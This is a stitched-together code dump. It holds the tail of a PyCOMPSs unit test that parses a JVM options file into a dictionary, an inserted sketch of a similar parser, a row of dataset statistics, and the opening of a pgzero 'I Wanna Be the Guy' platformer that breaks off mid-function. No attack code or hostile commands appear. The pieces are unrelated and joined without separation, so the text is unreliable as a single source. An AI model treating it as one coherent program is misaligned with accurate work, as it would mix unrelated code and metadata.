"-Dcompss.conn": "es.bsc.compss.connectors.DefaultSSHConnector",
"-Dcompss.masterName": "",
"-Dcompss.masterPort": "",
"-Dcompss.scheduler": "es.bsc.compss.scheduler.lookahead.locality.LocalityTS", # noqa: E501
"-Dgat.adaptor.path": "/opt/COMPSs/Dependencies/JAVA_GAT/lib/adaptors",
"-Dgat.debug": "true",
"-Dgat.broker.adaptor": "sshtrilead",
"-Dgat.file.adaptor": "sshtrilead",
"-Dcompss.worker.cp": "/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar", # noqa: E501
"-Dcompss.worker.jvm_opts": "-Xms1024m,-Xmx1024m,-Xmn400m",
"-Dcompss.worker.cpu_affinity": "automatic",
"-Dcompss.worker.gpu_affinity": "automatic",
"-Dcompss.worker.fpga_affinity": "automatic",
"-Dcompss.worker.fpga_reprogram": "",
"-Dcompss.profile.input": "",
"-Dcompss.profile.output": "",
"-Dcompss.scheduler.config": "",
"-Dcompss.external.adaptation": "false",
"-Djava.class.path": "/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar", # noqa: E501
"-Djava.library.path": "/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/usr/lib64/mpi/gcc/openmpi/lib64::/opt/COMPSs/Bindings/bindings-common/lib:/usr/lib64/jvm/java/jre/lib/amd64/server", # noqa: E501
"-Dcompss.worker.pythonpath": "/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/home/user/gitlab/framework/compss/programming_model/bindings/python:.:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:", # noqa: E501
"-Dcompss.python.interpreter": "python2",
"-Dcompss.python.version": "2",
"-Dcompss.python.virtualenvironment": "null",
"-Dcompss.python.propagate_virtualenvironment": "true",
"-Dcompss.python.mpi_worker": "false",
"other": True,
}
with open(jvm_opt_file, "w") as f_jvm:
f_jvm.write(
"""-XX:+PerfDisableSharedMem
-XX:-UsePerfData
-XX:+UseG1GC
-XX:+UseThreadPriorities
-XX:ThreadPriorityPolicy=42
-Dlog4j.configurationFile=/opt/COMPSs/Runtime/configuration/log/COMPSsMaster-log4j.debug
-Dcompss.to.file=false
-Dcompss.project.file=/opt/COMPSs/Runtime/configuration/xml/projects/default_project.xml
-Dcompss.resources.file=/opt/COMPSs/Runtime/configuration/xml/resources/default_resources.xml
-Dcompss.project.schema=/opt/COMPSs/Runtime/configuration/xml/projects/project_schema.xsd
-Dcompss.resources.schema=/opt/COMPSs/Runtime/configuration/xml/resources/resources_schema.xsd
-Dcompss.lang=python
-Dcompss.summary=false
-Dcompss.task.execution=compss
-Dcompss.storage.conf=null
-Dcompss.streaming=null
-Dcompss.streaming.masterName=null
-Dcompss.streaming.masterPort=null
-Dcompss.core.count=50
-Dcompss.appName=increment
-Dcompss.uuid=dc126fe7-1b0a-4360-80f2-55c815e2e604
-Dcompss.baseLogDir=
-Dcompss.specificLogDir=
-Dcompss.appLogDir={0}
-Dcompss.graph=false
-Dcompss.monitor=0
-Dcompss.tracing=0
-Dcompss.extrae.file=null
-Dcompss.comm=es.bsc.compss.nio.master.NIOAdaptor
-Dcompss.conn=es.bsc.compss.connectors.DefaultSSHConnector
-Dcompss.masterName=
-Dcompss.masterPort=
-Dcompss.scheduler=es.bsc.compss.scheduler.lookahead.locality.LocalityTS
-Dgat.adaptor.path=/opt/COMPSs/Dependencies/JAVA_GAT/lib/adaptors
-Dgat.debug=true
-Dgat.broker.adaptor=sshtrilead
-Dgat.file.adaptor=sshtrilead
-Dcompss.worker.cp=/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar
-Dcompss.worker.jvm_opts=-Xms1024m,-Xmx1024m,-Xmn400m
-Dcompss.worker.cpu_affinity=automatic
-Dcompss.worker.gpu_affinity=automatic
-Dcompss.worker.fpga_affinity=automatic
-Dcompss.worker.fpga_reprogram=
-Dcompss.profile.input=
-Dcompss.profile.output=
-Dcompss.scheduler.config=
-Dcompss.external.adaptation=false
-Djava.class.path=/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar
-Djava.library.path=/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/usr/lib64/mpi/gcc/openmpi/lib64::/opt/COMPSs/Bindings/bindings-common/lib:/usr/lib64/jvm/java/jre/lib/amd64/server
-Dcompss.worker.pythonpath=/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/home/user/gitlab/framework/compss/programming_model/bindings/python:.:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:
-Dcompss.python.interpreter=python2
-Dcompss.python.version=2
-Dcompss.python.virtualenvironment=null
-Dcompss.python.propagate_virtualenvironment=true
-Dcompss.python.mpi_worker=false
other
""".format(
temp_folder
) # noqa
)
result = convert_to_dict(jvm_opt_file)
assert len(result) == len(
jvm_expected_result
), "The sizes of the dictionaries does not match"
for k, v in jvm_expected_result.items():
if k not in result:
raise PyCOMPSsException("Key: %s is not in the result dictionary" % k)
assert (
v == result[k]
), "The value of key: %s does not match the expected value: %s" % (k, str(v))
assert (
result == jvm_expected_result
), "The jvm opts file has not been parsed as expected"
os.remove(jvm_opt_file)
shutil.rmtree(temp_folder)
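For reference, a minimal, hedged sketch of a parser that reproduces the mapping exercised by the test above. This is only an illustration consistent with the expected dictionary, not the actual pycompss.util.jvm.parser implementation, and the function name is made up:
def convert_jvm_opts_sketch(jvm_opt_file):
    """Parse a JVM options file into a dict:
    '-XX:<flag>' -> {'<flag>': True}, '-Dkey=value' -> {'-Dkey': 'value'},
    and any other non-empty token -> {token: True}."""
    options = {}
    with open(jvm_opt_file) as handle:
        for raw_line in handle:
            line = raw_line.strip()
            if not line:
                continue
            if line.startswith("-XX:"):
                # e.g. '-XX:+UseG1GC' -> {'+UseG1GC': True}
                options[line[len("-XX:"):]] = True
            elif line.startswith("-D") and "=" in line:
                # e.g. '-Dcompss.lang=python' -> {'-Dcompss.lang': 'python'}
                key, value = line.split("=", 1)
                options[key] = value
            else:
                options[line] = True
    return options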
| 53.562874 | 487 | 0.723644 | 1,124 | 8,945 | 5.705516 | 0.219751 | 0.053329 | 0.054889 | 0.041166 | 0.78871 | 0.786216 | 0.779043 | 0.779043 | 0.779043 | 0.779043 | 0 | 0.02439 | 0.119955 | 8,945 | 166 | 488 | 53.885542 | 0.790269 | 0.083846 | 0 | 0.022989 | 0 | 0.045977 | 0.635767 | 0.478615 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.011494 | false | 0 | 0.057471 | 0 | 0.068966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
878d0729351b449a7d382cd0b6a96676aa9239c0 | 41,871 | py | Python | iwanna.py | ZYM-PKU/PythonSummerSchool | b0a32dc2d9214fa9a794442bb3408c6f9f7f2b48 | ["MIT"] | null | null | null | iwanna.py | ZYM-PKU/PythonSummerSchool | b0a32dc2d9214fa9a794442bb3408c6f9f7f2b48 | ["MIT"] | null | null | null | iwanna.py | ZYM-PKU/PythonSummerSchool | b0a32dc2d9214fa9a794442bb3408c6f9f7f2b48 | ["MIT"] | null | null | null |
# coding=utf-8
import sys
import time
import math
import pgzrun
import random
# Global settings
WIDTH = 1280
HEIGHT = 720
BOTTOM=710
# Map ground blocks
bottoms=[]
# Moving platforms
platforms=[]
# Background
backs=[]
# Save points
saves=[]
# Buttons
buttons=[]
# Trees
trees=[]
# Apples
apples=[]
# Spikes
spines=[]
# Player
player=Actor('player_right')
RESET_POS=(0,BOTTOM)# respawn point
death_count=0# number of deaths
music_played=False# make sure the death music is played only once
test_mode=False# developer mode (invincible)
current_window=0# current window (0 means the start screen)
current_y=-200# position of the ending credits
death_end=False# unavoidable-death ending
tic=0.0
def init():
global RESET_POS,music_played
bottoms.clear()
bottom=Actor('start_bottom')
bottom.bottomleft=(0,720)
bottoms.append(bottom)
RESET_POS=(0,720-bottom.height)
spines.clear()
for i in range(8):
spine=Actor('spine_up')
spine.bottomleft=(50+i*150,720-bottom.height)
spine.points=[]
spine.name="bottom"
spines.append(spine)
edge_sample()
apples.clear()
center,radius=(220,260),120
apple=Actor('apple')
apple.pos=center
apple.name="center"
apples.append(apple)
for sita in range(5):
apple=Actor('apple')
apple.pos=(center[0]+radius*math.cos(sita*30),center[1]-radius*math.sin(sita*30))
apple.anchor=(center[0]-apple.pos[0],center[1]-apple.pos[1])
apple.name="rotate"
apples.append(apple)
center,radius=(1050,260),120
apple=Actor('apple')
apple.pos=center
apple.name="center"
apples.append(apple)
for sita in range(5):
apple=Actor('apple')
apple.pos=(center[0]+radius*math.cos(sita*30),center[1]-radius*math.sin(sita*30))
apple.anchor=(center[0]-apple.pos[0],center[1]-apple.pos[1])
apple.name="rotate"
apples.append(apple)
# Initialize the player
player.image='player_right'
player.bottomleft=(0,720-bottom.height)
# Velocity
player.vx=0
player.vy=0
player.staticvx=0# coasting horizontal velocity
player.ay=2# vertical acceleration (gravity)
# Jumping
player.jumptime=0# number of consecutive jumps
player.onbottom=True# whether the player is on the ground
player.anchor=player.midbottom
# Death
player.death=False
save=Actor('save')
save.bottomright=(1280,720-bottom.height)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
music_played=False
#music.stop()
music.play('bgm')
def ending():
global RESET_POS,music_played,test_mode,tic
test_mode=True# invincibility is enabled by default for the ending
tic=time.time()
music.play('death')
bottoms.clear()
bottom=Actor('start_bottom')
bottom.bottomleft=(0,800)
bottoms.append(bottom)
RESET_POS=(600,60)
spines.clear()
for i in range(8):
spine=Actor('spine_up')
spine.bottomleft=(80+i*150,800-bottom.height)
spine.points=[]
spine.name="bottom"
spines.append(spine)
edge_sample()
apples.clear()
platforms.clear()
backs.clear()
saves.clear()
buttons.clear()
trees.clear()
# Initialize the player
player.image='player_right'
player.bottomleft=RESET_POS
# Velocity
player.vx=0
player.vy=0
player.staticvx=0# coasting horizontal velocity
player.ay=0.2# vertical acceleration (gravity)
# Jumping
player.jumptime=0# number of consecutive jumps
player.onbottom=True# whether the player is on the ground
player.anchor=player.midbottom
# Death
player.death=False
def reset():
if current_window==1:smyreset()
elif current_window==2:zymreset()
elif current_window==3:zmxreset()
elif current_window==4:wgcreset()
elif current_window==5:ending()
def edge_sample():
'''Edge-sampling helper: traces the outline of each spike for collision detection.'''
level=4# sampling margin: smaller values make collisions easier, raising the difficulty
for spine in spines:
if spine.image=='spine_up':
x,y=spine.bottomleft
x+=level
for i in range(100):
x+=(spine.width-level*2)/200
y-=(spine.height-level)/100
spine.points.append((x,y))
for i in range(100):
x+=(spine.width-level*2)/200
y+=(spine.height-level)/100
spine.points.append((x,y))
elif spine.image=='spine_down':
x,y=spine.topleft
x+=level
for i in range(100):
x+=(spine.width-level*2)/200
y+=(spine.height-level)/100
spine.points.append((x,y))
for i in range(100):
x+=(spine.width-level*2)/200
y-=(spine.height-level)/100
spine.points.append((x,y))
elif spine.image in ('spine_left','spine_left_long') :
x,y=spine.topright
y+=level
for i in range(100):
x-=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
for i in range(100):
x+=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
elif spine.image =='spine_right' :
x,y=spine.topleft
y+=level
for i in range(100):
x+=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
for i in range(100):
x-=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
def recover_platform():# raise the platforms back up
for platform in platforms:
if platform.name=='platform1':
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]-160))
def draw():
global current_y
screen.clear()
if current_window==4: screen.blit('cover1',(0,0))
else: screen.blit('cover',(0,0))
for back in backs:back.draw()
for tree in trees:tree.draw()
for spine in spines:spine.draw()
for platform in platforms:platform.draw()
for bottom in bottoms:bottom.draw()
for save in saves:save.draw()
for button in buttons:button.draw()
for apple in apples:apple.draw()
player.draw()
screen.draw.text(f"Deaths: {death_count}",(0, 0),gcolor="green",fontsize=30,fontname="comic")
if player.death:
if current_window<5:screen.draw.text(" GAME OVER\n--------------------------------\n PRESS 'R' TO CONTINUE",(120, 180), shadow=(2,2), scolor="#202020",fontsize=80,fontname="comic")
else: screen.draw.text(" GAME OVER\n-------------------------------\n PRESS 'Esc' To Exit",(120,180), shadow=(2,2), scolor="#202020",fontsize=80,fontname="comic")
if current_window==0 and not player.death:
screen.draw.text(" I WANNA\n BE THE GUY",(130, 100), shadow=(2,2), scolor="#202020",gcolor="red",fontsize=100,fontname="comic")
screen.draw.text("Use left/right arrow keys to move, space to jump and 's' to save",(200, 380),color="black",fontsize=30,fontname="comic")
screen.draw.text("Version: 2.1.0",(1080, 680),gcolor="cyan",fontsize=30,fontname="comic")
screen.draw.text("POWERED BY PYTHON",(200, 550), color=(255,127,80),fontsize=80,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
if current_window==5:
if current_y<=2050:current_y+=1
screen.draw.text("Thanks for playing!",(120, current_y), shadow=(2,2), scolor="#202020",gcolor="cyan",fontsize=120,fontname="comic")
screen.draw.text("Developers:",(150, current_y-500), color=(220,20,60),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Zhao YiMing",(550, current_y-700), color=(255,215,0),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Zhang manxi",(200, current_y-900), color=(255,182,193),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Shen mingyu",(480, current_y-1100), color=(255,105,180),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Wang gongchen",(300, current_y-1300), color=(0,191,255),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text(f"Total Deaths: {death_count}",(250, current_y-2000), color=(0,255,127),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
def update():
global music_played
# Movement module
player.vy+=player.ay
player.vx=player.staticvx
if not player.death:
# Collision checks against solid objects
for bottom in bottoms:
if bottom.top<=player.bottom+player.vy<=bottom.bottom and player.left<bottom.right and player.right>bottom.left :
player.vy=0
player.bottom=bottom.top
player.onbottom=True
if bottom.top<=player.top+player.vy<=bottom.bottom and player.left<bottom.right and player.right>bottom.left :
player.vy=0
player.top=bottom.bottom
if bottom.left<=player.left+player.vx<=bottom.right and player.bottom>bottom.top and player.top<bottom.bottom :
player.vx=0
player.left=bottom.right
if bottom.left<=player.right+player.vx<=bottom.right and player.bottom>bottom.top and player.top<bottom.bottom :
player.vx=0
player.right=bottom.left
for platform in platforms:
if platform.top<=player.bottom+player.vy<=platform.bottom and player.left<platform.right and player.right>platform.left :
player.vy=0
player.bottom=platform.top
player.onbottom=True
if platform.top<=player.top+player.vy<=platform.bottom and player.left<platform.right and player.right>platform.left :
if not test_mode:player.death=True
else:
player.vy=0
player.bottom=platform.top
player.onbottom=True
if platform.left<=player.left+player.vx<=platform.right and player.bottom>platform.top+5 and player.top<platform.bottom :# the +5 offset keeps the momentary height difference of a rising platform from skewing this check
player.vx=0
player.left=platform.right
if platform.left<=player.right+player.vx<=platform.right and player.bottom>platform.top+5 and player.top<platform.bottom :
player.vx=0
player.right=platform.left
# Global (screen) boundary checks
if player.left+player.vx<0:
player.left=0
player.vx=0
if player.right+player.vx>WIDTH:
player.right=WIDTH
player.vx=0
if player.top+player.vy<0:
player.top=0
player.vy=0
if current_window==0:zymupdate()
elif current_window==1:smyupdate()
elif current_window==2:zymupdate()
elif current_window==3:zmxupdate()
elif current_window==4:wgcupdate()
# Death handling
elif not music_played and current_window!=5:
global death_count
death_count+=1
music.play_once('fail')
player.image='player_left_dead' if player.image=='player_left' else 'player_right_dead'
music_played=True
if current_window==5:endupdate()
else:
# Motion
player.left+=player.vx
if player.bottom<=1000:
player.bottom+=player.vy# the <1000 check prevents endless falling after death
def on_key_down(key):
global RESET_POS,test_mode,current_window
# Movement controls
if not player.death:
if key==key.RIGHT:
player.staticvx=8
player.image='player_right'
if key==key.LEFT:
player.staticvx=-8
player.image='player_left'
if key==key.SPACE:
if player.onbottom:player.jumptime=0
if player.jumptime<2:
if player.jumptime==0:
sounds.jump.play()
else:sounds.jump1.play()
player.vy=-20
player.jumptime+=1
player.onbottom=False
# Save at a checkpoint
if key==key.S:
for save in saves:
if player.colliderect(save) and save.image=='save' :
if save.name!='end':
tone.play('E4', 0.1)
save.image='saved'
RESET_POS=save.bottomleft
else:
tone.play('A#5', 0.1)
current_window+=1
if current_window==1:RESET_POS=(0,606)
elif current_window==2:RESET_POS=(0,710)
elif current_window==3:RESET_POS=(0,710)
elif current_window==4:RESET_POS=(0,606)
reset()
if player.death or test_mode:
if key==key.R and current_window<5:
if current_window==0:
init()
else:
reset()
if key==key.P:test_mode=not test_mode
if key==key.ESCAPE:sys.exit(0)
def on_key_up(key):
# Movement controls
if not player.death:
if key==key.RIGHT:
if not player.image=='player_left':
player.staticvx=0
if key==key.LEFT:
if not player.image=='player_right':
player.staticvx=0
def smyreset():
global music_played,BOTTOM
# Initialize the ground
bottoms.clear()
bottom=Actor('bottom')
bottom.bottomleft=(0,750)
bottoms.append(bottom)
BOTTOM=750-bottom.height
# Initialize the platforms
platforms.clear()
platform=Actor('platform')
platform.bottomright=(900,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomleft=(480,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.topleft=(340,350)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(200,500)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(1280,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
# Initialize the save points
saves.clear()
save=Actor('saved')
save.bottomleft=(0,BOTTOM)
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,519)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,220)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
# Initialize the buttons
buttons.clear()
button=Actor('button')
button.bottomright=(1280,BOTTOM)
buttons.append(button)
# Initialize the trees
trees.clear()
tree=Actor('tree')
tree.bottomleft=(1000,BOTTOM)
trees.append(tree)
# Initialize the apples
apples.clear()
apple=Actor('apple')
apple.pos=(1050,450)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(1180,390)
apple.name="normal"
apples.append(apple)
# Initialize the spikes
spines.clear()
for i in range(2):
spine=Actor('spine_right')
spine.bottomleft=(100,380-i*80)
spine.points=[]
spine.name="middle"
spines.append(spine)
# Trap spikes
for i in range(2):
spine=Actor('spine_up')
spine.bottomleft=(180+i*80,220)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
for i in range (8):
spine=Actor('spine_up')
spine.bottomleft=(100+100*i,750-bottom.height)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
edge_sample()
# Initialize the player
player.image='player_right'
player.bottomleft=RESET_POS
# Velocity
player.vx=0
player.vy=0
player.staticvx=0# coasting horizontal velocity
player.ay=2# vertical acceleration (gravity)
# Jumping
player.jumptime=0# number of consecutive jumps
player.onbottom=True# whether the player is on the ground
# Death
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def zymreset():
global music_played,BOTTOM
# Initialize the ground
bottoms.clear()
bottom=Actor('bottom1')
bottom.bottomleft=(0,800)
bottoms.append(bottom)
BOTTOM=800-bottom.height
bottom=Actor('bottom_half')
bottom.bottomright=(1174,580)
bottoms.append(bottom)
bottom=Actor('bottom_top_right')
bottom.bottomright=(1280,250)
bottoms.append(bottom)
bottom=Actor('bottom_top_left')
bottom.bottomright=(403,250)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(1174,519)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(1174-500,519)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.topleft=(237,392)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(0,452)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomleft=(900,162)
bottoms.append(bottom)
# Initialize the platforms
platforms.clear()
platform=Actor('platform')
platform.bottomleft=(1174,580)
platform.name='platform1'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('bottom_middle')
platform.topleft=(104,392)
platform.name='platform2'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('bottom_top_middle')
platform.bottomright=(503,250)
platform.name='platform3'
platform.animate_acted=False
platforms.append(platform)
# Initialize the background
backs.clear()
back=Actor('back1')
back.topright=(1280,580)
backs.append(back)
back=Actor('back2')
back.topright=(1280,250)
backs.append(back)
# Initialize the save points
saves.clear()
save=Actor('saved')
save.bottomleft=(0,BOTTOM)
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,519)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,162)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
save=Actor('save')
save.bottomleft=(280,392)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
# Initialize the buttons
buttons.clear()
button=Actor('button')
button.bottomright=(1280,BOTTOM)
buttons.append(button)
# Initialize the trees
trees.clear()
tree=Actor('tree')
tree.bottomleft=(100,BOTTOM)
trees.append(tree)
# Initialize the apples
apples.clear()
apple=Actor('apple')
apple.pos=(220,560)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(270,522)
apple.name="normal"
apples.append(apple)
center,radius=(880,360),120
apple=Actor('apple')
apple.pos=center
apple.name="center"
apples.append(apple)
for sita in range(5):
apple=Actor('apple')
apple.pos=(center[0]+radius*math.cos(sita*30),center[1]-radius*math.sin(sita*30))
apple.anchor=(center[0]-apple.pos[0],center[1]-apple.pos[1])
apple.name="rotate"
apples.append(apple)
# Initialize the spikes
spines.clear()
for i in range(4):
spine=Actor('spine_up')
spine.bottomleft=(500+i*170,BOTTOM)
spine.points=[]
spine.name="bottom"
spines.append(spine)
for i in range(4):
spine=Actor('spine_down')
spine.topleft=(585+i*170,580)
spine.points=[]
spine.name="bottom"
spines.append(spine)
for i in range(2):
spine=Actor('spine_right')
spine.bottomleft=(104,320-i*140)
spine.points=[]
spine.name="middle"
spines.append(spine)
spine=Actor('spine_right')
spine.bottomleft=(104,100+i*292)
spine.points=[]
spine.name="middle"
spines.append(spine)
for i in range(2):
spine=Actor('spine_up')
spine.bottomleft=(980+i*130,162)
spine.points=[]
spine.name="top"
spines.append(spine)
for i in range(3):
spine=Actor('spine_up')
spine.bottomleft=(503+i*130,162)
spine.points=[]
spine.name="top"
spines.append(spine)
spine=Actor('spine_left')
spine.bottomright=(252,250)
spine.points=[]
spine.name="middle"
spines.append(spine)
# Trap spikes
spine=Actor('spine_up')
spine.bottomright=(1170,500)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_left')
spine.topright=(503,519)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
for i in range(2):
spine=Actor('spine_up')
spine.bottomleft=(252+i*25,162)
spine.points=[]
spine.name="trap3"
spine.animate_acted=False
spines.append(spine)
edge_sample()# sample the spike edges
#初始化玩家
player.image='player_right'
player.bottomleft=RESET_POS
#速度
player.vx=0
player.vy=0
player.staticvx=0#inertial horizontal velocity
player.ay=2#vertical acceleration
#Jumping
player.jumptime=0#consecutive jump count
player.onbottom=True#whether the player is on the ground
player.anchor=player.midbottom
#Death
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def zmxreset():
global music_played,BOTTOM
#Initialize ground
bottoms.clear()
bottom=Actor('bottom1')
bottom.bottomleft=(0,800)
bottoms.append(bottom)
BOTTOM=800-bottom.height
bottom=Actor('bottom_top_left')
bottom.bottomright=(240,649)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(375,610)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(1150,370)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(723,225)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.topleft=(240,170)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.topleft=(450,88)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(450,730)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomleft=(552,170)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(510,730)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(723,580)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(900,500)
bottoms.append(bottom)
#Initialize platforms
platforms.clear()
platform=Actor('platform')
platform.bottomleft=(1174,580)
platform.name='platform1'
platform.animate_acted=False
platforms.append(platform)
#Initialize save points
saves.clear()
save=Actor('save')
save.bottomleft=(0,BOTTOM)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomleft=(350,265)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,519)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
save=Actor('save')
save.bottomright=(770,170)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomleft=(480,90)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
#Initialize buttons
buttons.clear()
button=Actor('button')
button.bottomright=(1280,BOTTOM)
buttons.append(button)
#Initialize trees
trees.clear()
tree=Actor('tree')
tree.bottomleft=(100,BOTTOM)
trees.append(tree)
tree=Actor('tree')
tree.bottomleft=(970,BOTTOM)
trees.append(tree)
#Initialize apples
apples.clear()
apple=Actor('apple')
apple.pos=(220,545)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(270,522)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(1130,470)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(1150,522)
apple.name="normal"
apples.append(apple)
#Initialize spikes
spines.clear()
for i in range(4):
spine=Actor('spine_up')
spine.bottomleft=(622+i*120,BOTTOM)
spine.points=[]
spine.name="bottom"
spines.append(spine)
spine=Actor('spine_right')
spine.bottomleft=(608,420)
spine.points=[]
spine.name="middle"
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(835,170)
spine.points=[]
spine.name="top"
spines.append(spine)
#Trap spikes
spine=Actor('spine_up')
spine.bottomright=(1179,440)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_left')
spine.topright=(450,519)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(175,190)
spine.points=[]
spine.name="trap3"
spine.animate_acted=False
spines.append(spine)
edge_sample()#sample spike edge points for collision detection
#Initialize player
player.image='player_right'
player.bottomleft=RESET_POS
#Velocity
player.vx=0
player.vy=0
player.staticvx=0#inertial horizontal velocity
player.ay=2#vertical acceleration
#Jumping
player.jumptime=0#consecutive jump count
player.onbottom=True#whether the player is on the ground
player.anchor=player.midbottom
#Death
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def wgcreset():
global music_played,BOTTOM
apples.clear()
buttons.clear()
#Initialize ground
bottoms.clear()
bottom=Actor('bottom')
bottom.bottomleft=(0,750)
bottoms.append(bottom)
BOTTOM=750-bottom.height
#Initialize platforms
platforms.clear()
platform=Actor('platform')
platform.bottomright=(680,500)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(550,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(350,300)
